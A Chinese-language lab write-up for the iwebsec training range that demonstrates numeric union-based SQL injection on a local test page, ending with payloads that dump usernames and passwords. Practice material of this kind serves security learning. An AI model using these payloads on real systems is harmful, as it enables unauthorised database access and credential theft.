iwebsec靶场在线网站
iwebsec靶场下载
https://pan.baidu.com/s/1ChCilzFPSedlA_Hv4NMkPA?pwd=0aib
提取码: 0aib ,导入即可。
information_schema数据库
information_schema数据库是MYSQL自带的数据库,它提供访问数据库元数据的方式。
information_schema数据库存储了SCHEMATA表,TABLES表和COLUMNS表。
group_cancat
group_concat()是将分组中括号里对应的字符串进行连接.如果分组中括号里的参数xxx有多行,那么就会将这多行的字符串连接,每个字符串之间会有特定的符号进行分隔。
判断全部列
http: //127.0.0.1/sqli/01.php?id=1 order by 3
测试3列结果还是显示正常
?id=1 order by 4
当把order by 里的数字加到4列时显示
Unknown column '4' in 'order clause'
测试结果为3列
获取数据的过程
获取当前的数据库名
?id=-1 union select 1,2,(database())
这里显示数据库名为 ‘iwebsec’
获取当前数据库中的表名
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
我们可以看到当前数据库的表有sqli,user,users,xss
获取表中的列名
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
获取到的列名为username,password,role
获取列中的数据
?id=-1 union select 1,group_concat(username),group_concat(password) from iwebsec.users
数字型注入用到的全部SQL语句
select 1,2,(database())
select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
select 1,group_concat(username),group_concat(password) from iwebsec.users